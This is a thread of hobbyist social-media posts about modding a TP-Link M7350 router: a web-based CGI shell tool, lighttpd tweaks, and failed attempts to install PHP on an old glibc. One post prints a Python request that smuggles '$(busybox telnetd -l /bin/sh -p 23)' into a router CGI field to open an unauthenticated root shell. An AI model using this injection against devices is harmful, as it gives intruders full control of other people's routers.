Lets write a lil tool,
so we don't need to use #telnet anymore

https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser

And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.

Without any command line. In the #webbrowser .
❤️ Lovely
Whats that ?
If you copy in a sh onto your router externalSD ?

..
Sure. added a FixPermission button just for that.  

I like #CgiBin . Is nice

(I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )

#repost •acws #acws #m7350 #tplink

Well turns out we can do without #php

Router hates #https connections, so we need to rewrite the entire uptime thing
(Furthermore -spider https is always retruning 404, but router is on, so yea.)

https://codeberg.org/alceawisteria/UptimeMonitor/src/branch/main/sh_ver

But it works.

Now I only need to figure out how to do #cron .
And I'm done.


Guess I'll be writing some customized *sh for it then.
That was *not* on my 2026 Bingo card.
(Note to self, check #GLIBC version on future routers, so you know what it can actually run !)


#repost •acws #acws #m7350 #tplink

Soooo


./opt/bin/php-cgi: /opt/lib/libc.so.6: version `GLIBC_2.25' not found (required by ./opt/bin/php-cgi)
./opt/bin/php-cgi: /opt/lib/libc.so.6: version `GLIBC_2.27' not found (required by ./opt/bin/php-cgi)
/media/card/php/test_cgi #
/media/card/php/test_cgi # cd ..
/media/card/php #

even #PHP 7.2.2 requires #GLIBC 2.25/2.27! That means ALL the Entware PHP packages are compiled against newer glibc than your router has (GLIBC 2.18).

This seems to a case of "How low can you go" :P
https://bin.entware.net/armv7sf-k3.2/archive/

I'm not sure trying to install php is worth it then.
After all, below 7 means that most of the stuff of mine, including the one I want needs to be rewritten.

Might aswell use #perl or #shell at that point....

#m7350 #tplink
#repost •acws #acws

How very.. #odd
After a slight #lighhttpd change
----------------
server.modules = (
/ # # Uncomment the CGI assignment line
/ # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
/ # grep -n "cgi.assign" /etc/lighttpd.conf
141: cgi.assign = ( "" => "" )
144: cgi.assign = ( "" => "" )
248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
/
-------------

and rebooting the #m7350 now #telnet will not renable again with the script.

Whats even weirder.

qcmap_web_cgi throws a 404..
I'm eternally confused

We still get a token no problemo, but somehow telnet is now closed and stays ?
(Why would a router reboot or slight lighttpd change cause this ?)

Should've enabled #adb while I had the chance haha.

Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
And even #perl has issues Ohwell




C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
<string>&#58;1&#58; SyntaxWarning&#58; invalid escape sequence '\$'
404 <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http&#58;//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http&#58;//www.w3.org/1999/xhtml" xml&#58;lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
</body>
</html>






#repost •acws #acws

So you are trying to tell me that noone bothered to archive these #entware files
1592
phodav_2.5-1_armv7-3.2.ipk 18-Apr-2021 13:23 28453
php7-cgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1507945
php7-cli_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1527762
php7-fastcgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 786
php7-fpm_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1562752
php7-mod-bcmath_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 12214
php7-mod-calendar_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 10578
php7-mod-ctype_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 3104
php7-mod-curl_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 33116
php7-mod-dom_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 45322
php7-mod-exif_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 27343
php7-mod-fileinfo_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 401782
php7-mod-filter_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 15741
php7-mod-ftp_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 17577
php7-mod-gd_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 26089
php7-mod-gettext_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 4391

and now they are Gone ???

What is the #IT community even doing anyways ?
https://web.archive.org/web/20210613113743/https://bin.entware.net/armv7sf-k3.2/

Now I can't get a 2.2.7 GLIBC to be able to use #php 8


And I cannot get a #php7 which might just be compatible with my old one as there is no backup on da whole. wide. web

A
Ma
Zing.


 

#repost •acws #acws #m7350 #tplink

Looks like #M7350 s GLIBC_2.25 is not compatible with #php 8 hmmmmmm


#repost •acws #acws

Talking with people about ma lil #router .

Exciting  
#m7350 #tplink

Say hello to "The #Internetbucket"

My best invention yet 
- @dr_muesli

It Fills with Overuse instead of emptying
https://codepen.io/ryedai1/pen/NPrGXxK

Its still very .. erm un bucket like..
Désolé
But the data is updated automagically.

 


(The fetch php is amended to my #M7350 so if you have a different you'd need to get your own

To commemorate this:

Re: https://infosec.exchange/@alcea/115791774641598327
#repost •acws #acws #CodeAlcea

Protip: Add a "?animate" or perhaps even a "speed=1" for extra #coolness